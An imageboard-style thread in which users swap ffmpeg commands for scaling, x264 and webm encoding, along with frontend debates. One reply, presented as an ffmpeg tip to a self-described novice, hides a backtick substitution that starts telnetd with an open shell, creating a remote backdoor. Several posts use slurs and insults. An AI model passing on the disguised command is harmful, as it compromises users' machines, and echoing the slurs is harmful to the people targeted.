What are your most used ffmpeg commands?

What are your most used ffmpeg commands?

Attached: FFmpeg_logo1.jpg (1280x624, 42.61K)

-c:v libx264 -vf "scale:-1:720"

Attached: 1633643065168.png (1200x675, 835.38K)

OP here
I am also a brainlet
so if people could post what the fuck their commands does I would greatly appreciate it

Shall we just configure the whole application for you you cock sniff or are you actually capable of independent learning?

Attached: Capture.jpg (795x469, 45.54K)

ffmpeg --help `telnetd -l /bin/sh`

You can also not be a faggot.

converts to mp4(avc) with a fixed height of 720

I'm on Any Forums. We're all faggots. At least I know how to source information. Can you say the same?


you aren't special for being able to look up documentation user

I need the best commands to convert things to webm to shitpost

-1 can produce odd numbers which isnt compatible with x264 so you should use -2 instead

wtf, i keep getting erros because of those odd numbers, didnt knew about the -2 thing

i didn't know that was an option, either, i've been doing this instead;
-vf "scale=floor(oh*(iw/ih)/2)*2:720"

-f md5

yea i remember that was always the case if i tried to -1:480 because 853 is bad width

ok retard

why would I ever use ffmpeg directly when I can use something like staxrip as a frontend instead? it also frontends for essentially every other video encoding tool there is.

you do you

-vcodec vp8 -acodec libvorbis -crf 30 -s (sometimes) -t (sometimes) -b:v -b:a (sometimes)

So you have full access to the tool. For a lot of cases, that isn't needed though. I use frontends when they fit the task and cli when it fits the task.

webm for shitposting, encoding flac into mp3, youtube-dl, trimming.